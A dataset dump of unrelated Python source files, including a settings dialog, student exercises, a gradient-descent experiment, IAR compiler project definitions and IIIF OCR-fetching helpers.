def on_rebuild_database_clicked(self):\n \"\"\"Restores the database when the restore database button is clicked\"\"\"\n if not self.is_rebuilding_database: # check if already running\n if GeneralUtils.ask_confirmation('Are you sure you want to rebuild the database?'):\n self.is_rebuilding_database = True\n self.update_database_dialog.update_database(ManageDB.get_all_report_files() +\n ManageDB.get_all_cost_files(),\n True)\n self.is_rebuilding_database = False\n else:\n if self.settings.show_debug_messages: print('Database is already being rebuilt')\n\n def update_settings(self):\n \"\"\"Updates the app's settings using the values entered on the UI\"\"\"\n self.settings.show_debug_messages = self.show_debug_checkbox.isChecked()\n self.settings.yearly_directory = self.yearly_dir_edit.text()\n self.settings.other_directory = self.other_dir_edit.text()\n self.settings.request_interval = self.request_interval_spin_box.value()\n self.settings.request_timeout = self.request_timeout_spin_box.value()\n self.settings.concurrent_vendors = self.concurrent_vendors_spin_box.value()\n self.settings.concurrent_reports = self.concurrent_reports_spin_box.value()\n self.settings.user_agent = self.user_agent_edit.text()\n self.settings.default_currency = self.default_currency_combobox.currentText()\n\n def save_settings_to_disk(self):\n \"\"\"Saves all settings to disk\"\"\"\n json_string = json.dumps(self.settings, default=lambda o: o.__dict__)\n GeneralUtils.save_json_file(SETTINGS_FILE_DIR, SETTINGS_FILE_NAME, json_string)","sub_path":"Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":11638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"401183469","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 25 13:07:42 2018\n\n@author: bianl\n\"\"\"\n\ndef sum_digits(s):\n \"\"\" \n assumes s a string\n \n Returns an int that is the sum of all of the digits in s.\n \n If there are no digits in s it raises a ValueError exception. \n \"\"\"\n assert type(s) is str\n sum = 0\n for i in range(len(s)):\n try:\n num = int(s[i])\n except:\n continue\n else:\n sum += num\n if sum == 0:\n raise ValueError \n else:\n return sum\n \n \nprint(sum_digits(\"a;d\"))","sub_path":"Introduction to Computer Science and Programming Using Python/Finalterm/Ft_problem3.py","file_name":"Ft_problem3.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"145404619","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\n#reading data\ndata = pd.read_csv('penguins.csv')\n#selecting columns that we want\ndata = data [['species' , 'bill_length_mm','bill_depth_mm']]\n#shuffling data\ndata = data.sample(frac=1).reset_index(drop=True)\n\ndata['species']= data['species'].astype('category')\n#dropping null values\ndata = data.dropna()\n#changing categorical variable to numerical\ndata['species']= data['species'].cat.codes\n#Ade = 0 Gentoo = 2 Chin = 1\n#splitting target and features\ntarget = data['species']\nfeatures = data[['bill_length_mm','bill_depth_mm']]\n#normalization\nfeatures = (features - features.min())/(features.max() - features.min())\n#changing terget and faetures type to numpy array\ntarget = target.to_numpy()\nfeatures = features.to_numpy()\n#splitting train and test sets\ny_train = target[:300]\ny_test = target[300:]\nx_train = features[:300]\nx_test = features[300:]\n#selecting 2 cetegories(Gentoo and adelie)\nx_train_a = x_train[y_train != 1]\ny_train_a = y_train[y_train != 1]\nx_test_a = x_test[y_test != 1]\ny_test_a = y_test[y_test != 1]\n#normalization\n#add a column of ones to features\nx_train_a = np.append(np.ones((x_train_a.shape[0],1)) , x_train_a , axis = 1)\nx_test_a = np.append(np.ones((x_test_a.shape[0],1)) , x_test_a , axis = 1)\n#featuers of samples that are from class 2 * -1\nx_train_a[y_train_a == 2] = x_train_a[y_train_a == 2]*-1\n\nb = np.ones((x_train_a.shape[0],1))\n#gradian decent\n#converge_time is a list that store differnt learning rates and their number of itration needed for convergence\nconverge_time = []\n#we start with learning rate = 0.0001 and in each step we add 0.0001 to it\nlearning_rate = .0001\n#first loop is for testing different learning rates\nfor j in range(80): \n a = np.zeros((3,1))\n #this loop is for executing gradient decent\n for i in range(2000):\n a = a - learning_rate * (x_train_a.T @ (x_train_a @ a - b))\n #condition for convergence\n if np.sum(np.power(x_train_a @ a - b , 2)) <27 :\n converge_time.append([learning_rate,i])\n break\n #checking if this learning rate didnt converge\n if np.sum(np.power(x_train_a @ a - b , 2)) > 27:\n min_fail = learning_rate\n break\n learning_rate+=.0001\n \n#plotting learning rate vs number of iterations needed for convergence\nprint('minimum learning rate that fails to lead convergences' , min_fail)\nplt.plot([x[0] for x in converge_time ] , [x[1] for x in converge_time])\nplt.xlabel('learning rate')\nplt.ylabel('number of iteretions for convergence')\nplt.savefig('6b.png')\n\n","sub_path":"3/codes/P6/b/6b.py","file_name":"6b.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"388587144","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 3 22:48:29 2021\r\n\r\n@author: user\r\n\"\"\"\r\n\r\ndef sift(li,low,high):\r\n i=low\r\n j=2*i+1\r\n tmp=li[low]\r\n while j<=high:\r\n if li[j+1]heap[0]:\r\n heap[0]=li[i]\r\n sift(heap, 0, k-1)\r\n for i in range (k-1,-1,-1):\r\n heap[0],heap[i]=heap[i],heap[0]\r\n sift(heap, 0, i-1)\r\n return heap","sub_path":"topk_answer.py","file_name":"topk_answer.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"515548582","text":"# Copyright 2014 0xc0170\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nclass IARDefinitions():\n\n def get_mcu_definition(self, name):\n \"\"\" If MCU found, returns its definition dic, error otherwise. \"\"\"\n try:\n return self.mcu_def[name]\n except KeyError:\n raise RuntimeError(\n \"Mcu was not recognized for IAR. Please check mcu_def dictionary.\")\n\n # MCU definitions which are currently supported. Add a new one, define a name as it is\n # in IAR, create an empty project for that MCU, open the project file (ewp) in any text\n # editor, find out the values of SelectEditMenu, CoreOrChip and FPU if\n # it's not disabled (=0)\n mcu_def = {\n 'LPC1768': {\n 'OGChipSelectEditMenu': {\n 'state': 'LPC1768\tNXP LPC1768',\n },\n 'OGCoreOrChip': {\n 'state': 1,\n }\n },\n 'MKL25Z128xxx4': {\n 'OGChipSelectEditMenu': {\n 'state': 'MKL25Z128xxx4\tFreescale MKL25Z128xxx4',\n },\n 'OGCoreOrChip': {\n 'state': 1,\n }\n },\n 'STM32F401xB': {\n 'OGChipSelectEditMenu': {\n 'state': 'STM32F401xB\tST STM32F401xB',\n },\n 'OGCoreOrChip': {\n 'state': 1,\n },\n 'FPU': {\n 'state': 5,\n },\n },\n }\n\n iar_settings = {\n 'Variant': {\n 'state': 0,\n },\n 'GEndianMode': { # [General Options][Target] Endian mode\n 'state': 0,\n },\n 'Input variant': {\n 'version': 0,\n 'state': 0,\n },\n 'Output variant': {\n 'state': 1,\n },\n 'GOutputBinary': { # [General Options][Output] Executable or library\n 'state': 0, # 1 - library, 0 - executable\n },\n 'FPU': {\n 'version': 2,\n 'state': 0,\n },\n 'GRuntimeLibSelect': { # [General Options] Use runtime library\n 'version': 0,\n 'state': 0, # 0 - none, 1 - normal, 2 - full, 3 - custom\n },\n 'GRuntimeLibSelectSlave': {\n 'version': 0,\n 'state': 0,\n },\n 'GeneralEnableMisra': { # [General Options] Enable Misra-C\n 'state': 0,\n },\n 'GeneralMisraVerbose': { # [General Options] Misra verbose\n 'state': 0,\n },\n 'OGChipSelectEditMenu': { # [General Options] Select MCU (be aware, tabs are needed in some cases)\n 'state': 0,\n },\n 'GenLowLevelInterface': { # [General Options] Use semihosting\n # [General Options] 0 - none, 1 - semihosting, 2 - IAR breakpoint\n 'state': 0,\n },\n 'GEndianModeBE': {\n 'state': 0,\n },\n 'OGBufferedTerminalOutput': { # [General Options] Buffered terminal output\n 'state': 0,\n },\n 'GenStdoutInterface': { # [General Options] Stdout/err\n 'state': 0, # [General Options] 0 - semihosting, 1 - SWD\n },\n 'GeneralMisraVer': {\n 'state': 0,\n },\n 'GFPUCoreSlave': {\n 'state': 0,\n },\n 'GBECoreSlave': {\n 'state': 0,\n },\n 'OGUseCmsis': { # [General Options][Lib configuration] Use CMSIS Lib\n 'state': 0,\n },\n 'OGUseCmsisDspLib': { # [General Options][Lib configuration] Use CMSIS DSP Lib, only valid if CMSIS Lib is selected\n 'state': 0,\n },\n 'CCPreprocFile': {\n 'state': 0,\n },\n 'CCPreprocComments': {\n 'state': 0,\n },\n 'CCPreprocLine': {\n 'state': 0,\n },\n 'CCListCFile': { # [C/C++ Compiler][Output] Output list file\n 'state': 0,\n },\n 'CCListCMnemonics': {\n 'state': 0,\n },\n 'CCListCMessages': {\n 'state': 0,\n },\n 'CCListAssFile': { # [C/C++ Compiler][Output] Output assembler file\n 'state': 0,\n },\n 'CCListAssSource': {\n 'state': 0,\n },\n 'CCEnableRemarks': {\n 'state': [],\n },\n 'CCDiagSuppress': {\n 'state': '',\n },\n 'CCDiagRemark': {\n 'state': '',\n },\n 'CCDiagWarning': {\n 'state': '',\n },\n 'CCDiagError': {\n 'state': '',\n },\n 'CCObjPrefix': { # Generate object files for C/C++\n 'state': 1,\n },\n 'CCAllowList': { # [C/C++ Compiler] Enable transformations (Optimizations)\n 'version': 1,\n # Each bit is for one optimization settings. For example second bit\n # is for loop unrolling\n 'state': 1111111,\n },\n 'CCDebugInfo': { # [C/C++ Compiler] Generate debug information\n 'state': 1,\n },\n 'IEndianMode': {\n 'state': 1,\n },\n 'IProcessor': {\n 'state': 1,\n },\n 'IExtraOptionsCheck': {\n 'state': 0,\n },\n 'IExtraOptions': {\n 'state': 0,\n },\n 'CCLangConformance': { # [C/C++ Compiler] Language conformance\n # 0 - standard with IAR extensions, 1 - standard, 2 - strict\n 'state': 0,\n },\n 'CCSignedPlainChar': { # [C/C++ Compiler] Plain char\n 'state': 1, # 0 - signed, 1 - unsigned\n },\n 'CCRequirePrototypes': { # [C/C++ Compiler] Require prototypes\n 'state': 0,\n },\n 'CCMultibyteSupport': {\n 'state': 0,\n },\n 'CCCompilerRuntimeInfo': {\n 'state': 0,\n },\n 'CCDiagWarnAreErr': {\n 'state': 0,\n },\n 'IFpuProcessor': {\n 'state': 0,\n },\n 'OutputFile': {\n 'state': '',\n },\n 'CCLibConfigHeader': {\n 'state': 0,\n },\n 'PreInclude': {\n 'state': 0,\n },\n 'CompilerMisraOverride': {\n 'state': 0,\n },\n 'CCStdIncCheck': {\n 'state': 0,\n },\n 'CCCodeSection': {\n 'state': '.text',\n },\n 'IInterwork2': {\n 'state': 0,\n },\n 'IProcessorMode2': {\n 'state': 0,\n },\n 'IInterwork2': {\n 'state': 0,\n },\n 'CCOptLevel': { # [C/C++ Compiler] Optimization level\n 'state': 0, # 0 - None, 1 - Low, 2 - Medium , 3 - High\n },\n 'CCOptStrategy': { # [C/C++ Compiler] Valid only for Optimization level High\n 'version': 0,\n 'state': 0, # 0 - Balanced, 1 - Size, 2 - Speed\n },\n 'CCOptLevelSlave': {\n 'state': 0,\n },\n 'CompilerMisraRules98': {\n 'version': 0,\n 'state': 0,\n },\n 'CompilerMisraRules04': {\n 'version': 0,\n 'state': 0,\n },\n 'CCPosIndRopi': { # [C/C++ Compiler][Code] Code and read-only data\n 'state': 0,\n },\n 'IccLang': { # [C/C++ Compiler] C/C++ Language selection\n 'state': 0, # 0 - C, 1- C++, 2 - Auto\n },\n 'CCPosIndNoDynInit': { # [C/C++ Compiler][Code]\n 'state': 0,\n },\n 'CCPosIndRwpi': { # [C/C++ Compiler][Code] Read write/data\n 'state': 0,\n },\n 'IccCDialect': { # [C/C++ Compiler] C dialect\n 'state': 1, # 0 - C89, 1 - C90\n },\n 'IccAllowVLA': { # [C/C++ Compiler] Allow VLA (valid only for C99)\n 'state': 0,\n },\n 'IccCppDialect': { # [C/C++ Compiler] C++ dialect\n 'state': 0, # 0 - Embedded C++, 1 - Extended embedded, 2 - C++\n },\n 'IccExceptions': { # [C/C++ Compiler] With exceptions (valid only for C++ dialect 2)\n 'state': 0,\n },\n 'IccRTTI': { # [C/C++ Compiler] With RTTI (valid only for C++ dialect 2)\n 'state': 0,\n },\n 'IccStaticDestr': {\n 'state': 1,\n },\n 'IccCppInlineSemantics': { # [C/C++ Compiler] C++ inline semantic (valid only for C99)\n 'state': 0,\n },\n 'IccCmsis': {\n 'state': 1,\n },\n 'IccFloatSemantics': { # [C/C++ Compiler] Floating point semantic\n 'state': 0, # 0 - strict, 1 - relaxed\n },\n\n 'AObjPrefix': { # Generate object files for assembly files\n 'state': 1,\n },\n 'AEndian': {\n 'state': 0,\n },\n 'ACaseSensitivity': {\n 'state': 0,\n },\n 'MacroChars': {\n 'state': 0,\n },\n 'AWarnEnable': {\n 'state': 0,\n },\n 'AWarnWhat': {\n 'state': 0,\n },\n 'AWarnOne': {\n 'state': 0,\n },\n 'AWarnRange1': {\n 'state': 0,\n },\n 'AWarnRange2': {\n 'state': 0,\n },\n 'ADebug': { # [Assembler] Generate debug info\n 'state': 0,\n },\n 'AltRegisterNames': {\n 'state': 0,\n },\n 'ADefines': { # [Assembler] Preprocessor - Defines\n 'state': '',\n },\n 'AList': {\n 'state': 0,\n },\n 'AListHeader': {\n 'state': 0,\n },\n 'AListing': {\n 'state': 0,\n },\n 'Includes': {\n 'state': '',\n },\n 'MacDefs': {\n 'state': 0,\n },\n 'MacExps': {\n 'state': 0,\n },\n 'MacExec': {\n 'state': 0,\n },\n 'OnlyAssed': {\n 'state': 0,\n },\n 'MultiLine': {\n 'state': 0,\n },\n 'PageLengthCheck': {\n 'state': 0,\n },\n 'PageLength': {\n 'state': 0,\n },\n 'TabSpacing': {\n 'state': 0,\n },\n 'AXRefDefines': {\n 'state': 0,\n },\n 'AXRef': {\n 'state': 0,\n },\n 'AXRefInternal': {\n 'state': 0,\n },\n 'AXRefDual': {\n 'state': 0,\n },\n 'AProcessor': {\n 'state': 0,\n },\n 'AFpuProcessor': {\n 'state': 0,\n },\n 'AOutputFile': {\n 'state': 0,\n },\n 'AMultibyteSupport': {\n 'state': 0,\n },\n 'ALimitErrorsCheck': {\n 'state': 0,\n },\n 'ALimitErrorsEdit': {\n 'state': 100,\n },\n 'AIgnoreStdInclude': {\n 'state': 0,\n },\n 'AUserIncludes': {\n 'state': '',\n },\n 'AExtraOptionsCheckV2': {\n 'state': 0,\n },\n 'AExtraOptionsV2': {\n 'state': 0,\n },\n 'OOCOutputFormat': {\n 'state': 0,\n },\n 'OCOutputOverride': {\n 'state': 0,\n },\n 'OOCCommandLineProducer': {\n 'state': 0,\n },\n 'OOCObjCopyEnable': {\n 'state': 1,\n },\n\n 'IlinkOutputFile': {\n 'state': 0,\n },\n 'IlinkLibIOConfig': {\n 'state': 0,\n },\n 'XLinkMisraHandler': {\n 'state': 0,\n },\n 'IlinkInputFileSlave': {\n 'state': 0,\n },\n 'IlinkDebugInfoEnable': {\n 'state': 0,\n },\n 'IlinkKeepSymbols': {\n 'state': 0,\n },\n 'IlinkRawBinaryFile': {\n 'state': 0,\n },\n 'IlinkRawBinarySymbol': {\n 'state': 0,\n },\n 'IlinkRawBinarySegment': {\n 'state': 0,\n },\n 'IlinkRawBinaryAlign': {\n 'state': 0,\n },\n 'IlinkDefines': {\n 'state': 0,\n },\n 'IlinkConfigDefines': {\n 'state': 0,\n },\n 'IlinkMapFile': {\n 'state': 0,\n },\n 'IlinkLogFile': {\n 'state': 0,\n },\n\n 'IlinkLogInitialization': {\n 'state': 0,\n },\n 'IlinkLogModule': {\n 'state': 0,\n },\n 'IlinkLogSection': {\n 'state': 0,\n },\n 'IlinkLogVeneer': {\n 'state': 0,\n },\n 'IlinkIcfOverride': {\n 'state': 0,\n },\n 'IlinkEnableRemarks': {\n 'state': 0,\n },\n 'IlinkSuppressDiags': {\n 'state': 0,\n },\n\n 'IlinkTreatAsRem': {\n 'state': 0,\n },\n 'IlinkTreatAsWarn': {\n 'state': 0,\n },\n 'IlinkTreatAsErr': {\n 'state': 0,\n },\n 'IlinkWarningsAreErrors': {\n 'state': 0,\n },\n 'IlinkUseExtraOptions': {\n 'state': 0,\n },\n 'IlinkExtraOptions': {\n 'state': 0,\n },\n 'IlinkLowLevelInterfaceSlave': {\n 'state': 0,\n },\n 'IlinkAutoLibEnable': {\n 'state': 0,\n },\n 'IlinkProgramEntryLabelSelect': {\n 'state': 0,\n },\n 'IlinkProgramEntryLabel': {\n 'state': 0,\n },\n }\n","sub_path":"project_generator/exporters/iar_definitions.py","file_name":"iar_definitions.py","file_ext":"py","file_size_in_byte":13799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"585403537","text":"__author__ = \"Gilevich Vyacheslav (gilevich@me.com)\"\n\nimport sys\nimport nltk\n\nif len(sys.argv) != 3:\n\tprint(\"\"\"\nSorts corpora from easies to hardest sentences (based on sentences' words' frequency)\n\nUsage:\n{0} /path/to/translated.txt /path/to/original.txt\"\"\".format(sys.argv[0]))\nelse:\n\ttexts = []\n\twords = [dict(),dict()]\n\twith open(sys.argv[1], 'r') as translated, open(sys.argv[2], 'r') as original:\n\t\tfor translated_row in translated:\n\t\t\toriginal_row = original.readline()\n\t\t\ttexts.append([translated_row, original_row])\n\n\t\t\tfor word in translated_row.split():\n\t\t\t\tif word in words[0]:\n\t\t\t\t\twords[0][word] += 1\n\t\t\t\telse:\n\t\t\t\t\twords[0][word] = 1\n\n\t\t\tfor word in original_row.split():\n\t\t\t\tif word in words[1]:\n\t\t\t\t\twords[1][word] += 1\n\t\t\t\telse:\n\t\t\t\t\twords[1][word] = 1\n\n\ttexts = sorted(texts, key=lambda lines: sum([sum([1/words[i][word] for word in lines[i].split()]) for i in range(2)]) )\n\n\twith open(sys.argv[1], 'w+') as translated, open(sys.argv[2], 'w+') as original:\n\t\tfor lines in texts:\n\t\t\ttranslated.write(lines[0])\n\t\t\toriginal.write(lines[1])\n\n\n","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"604622539","text":"import requests\nimport json\nimport csv\nfrom django.conf import settings\nfrom apps.utils.fetch import fetch_url\nimport config.settings.local as local_settings\nimport xml.etree.ElementTree as ET\n\ndef get_canvas_info(canvas):\n \"\"\" Given a url, this function returns a dictionary of all collections.\"\"\"\n return fetch_url(canvas.service_id, timeout=settings.HTTP_REQUEST_TIMEOUT, format='json')\n\n# TODO figure out a way to test the fetch\ndef fetch_positional_ocr(canvas):\n if 'archivelab' in canvas.IIIF_IMAGE_SERVER_BASE.IIIF_IMAGE_SERVER_BASE:\n return fetch_url(\"https://api.archivelab.org/books/{m}/pages/{p}/ocr?mode=words\".format(m=canvas.manifest.pid, p=canvas.pid.split('$')[-1]))\n elif 'images.readux.ecds.emory' in canvas.IIIF_IMAGE_SERVER_BASE.IIIF_IMAGE_SERVER_BASE:\n return fetch_url(\"https://raw.githubusercontent.com/ecds/ocr-bucket/master/{m}/{p}.tsv\".format(m=canvas.manifest.pid, p=canvas.pid.split('_')[-1].replace('.jp2', '').replace('.jpg', '').replace('.tif', '')), format='text')\n else:\n return fetch_url(\"{p}{c}{s}\".format(p=settings.DATASTREAM_PREFIX, c=canvas.pid.replace('fedora:',''), s=settings.DATASTREAM_SUFFIX), format='text/plain')\n\ndef add_positional_ocr(canvas, result):\n ocr = []\n if 'archivelab' in canvas.IIIF_IMAGE_SERVER_BASE.IIIF_IMAGE_SERVER_BASE:\n if 'ocr' in result and result['ocr'] is not None:\n for index, word in enumerate(result['ocr']):\n if len(word) > 0:\n for w in word:\n ocr.append({\n 'content': w[0],\n 'w': (w[1][2] - w[1][0]),\n 'h': (w[1][1] - w[1][3]),\n 'x': w[1][0],\n 'y': w[1][3]\n })\n elif 'images.readux.ecds.emory' in canvas.IIIF_IMAGE_SERVER_BASE.IIIF_IMAGE_SERVER_BASE:\n # include the quote marks in content\n class include_quotes_dialect(csv.Dialect):\n lineterminator = '\\n'\n delimiter= '\\t'\n quoting = csv.QUOTE_NONE # perform no special processing of quote characters\n reader = csv.DictReader(result.split('\\n'), dialect=include_quotes_dialect)\n for row in reader:\n content = row['content']\n w = int(row['w'])\n h = int(row['h'])\n x = int(row['x'])\n y = int(row['y'])\n ocr.append({\n 'content': content,\n 'w': w,\n 'h': h,\n 'x': x,\n 'y': y,\n })\n else:\n if result is not None:\n # What comes back from fedora is 8-bit bytes\n for index, word in enumerate(result.decode('UTF-8-sig').strip().split('\\r\\n')):\n if (len(word.split('\\t')) == 5):\n ocr.append({\n 'content': word.split('\\t')[4],\n 'w': int(word.split('\\t')[2]),\n 'h': int(word.split('\\t')[3]),\n 'x': int(word.split('\\t')[0]),\n 'y': int(word.split('\\t')[1])\n })\n if (ocr):\n return ocr\n else:\n return None\n\ndef fetch_alto_ocr(canvas):\n if 'archivelab' in canvas.IIIF_IMAGE_SERVER_BASE.IIIF_IMAGE_SERVER_BASE:\n return None\n else:\n url = \"{p}{c}/datastreams/tei/content\".format(p=settings.DATASTREAM_PREFIX, c=canvas.pid.replace('fedora:',''))\n return fetch_url(url, format='text/plain')\n\ndef add_alto_ocr(canvas, result):\n if result == None:\n return None\n ocr = []\n surface = ET.fromstring(result)[-1][0]\n for zones in surface:\n if 'zone' in zones.tag:\n for line in zones:\n if line[-1].text is None:\n continue\n ocr.append({\n 'content': line[-1].text,\n 'h': int(line.attrib['lry']) - int(line.attrib['uly']),\n 'w': int(line.attrib['lrx']) - int(line.attrib['ulx']),\n 'x': int(line.attrib['ulx']),\n 'y': int(line.attrib['uly'])\n })\n if (ocr):\n return ocr\n else:\n return None\n","sub_path":"apps/iiif/canvases/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"261345777","text":"\"\"\"\nLiczby pierwsze\n\"\"\"\nn = int(input('Liczba testów: '))\nwhile n > 0:\n liczba = int(input(f'Liczba {n}:'))\n if liczba == 1:\n print('TAK')\n n -= 1\n continue\n elif liczba == 2:\n print('NIE')\n n -= 1\n continue\n for elem in range(2, liczba):\n if liczba % elem == 0:\n print('NIE')\n break\n else:\n print('TAK')\n\n n -= 1\n","sub_path":"028 Liczby pierwsze/LiczbyPierwsze.py","file_name":"LiczbyPierwsze.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"295747833","text":"#!/usr/bin/env python\n# coding=utf-8\n# Stan 2012-03-10\n\nfrom __future__ import (division, absolute_import,\n print_function, unicode_literals)\n\nimport os\n\nfrom ...core.types23 import * # str\n\n\ndef prepare_dir(filename, options, recorder):\n try:\n filename = str(filename)\n\n except UnicodeDecodeError:\n recorder.warning(\"Filename encoding is wrong!\", target=repr(filename), once=\"dir_1\")\n return\n\n recorder.dir = filename\n return dict(\n provider = recorder.provider,\n name = filename,\n )\n","sub_path":"index_cli/base/proceed/filesystem_dir.py","file_name":"filesystem_dir.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}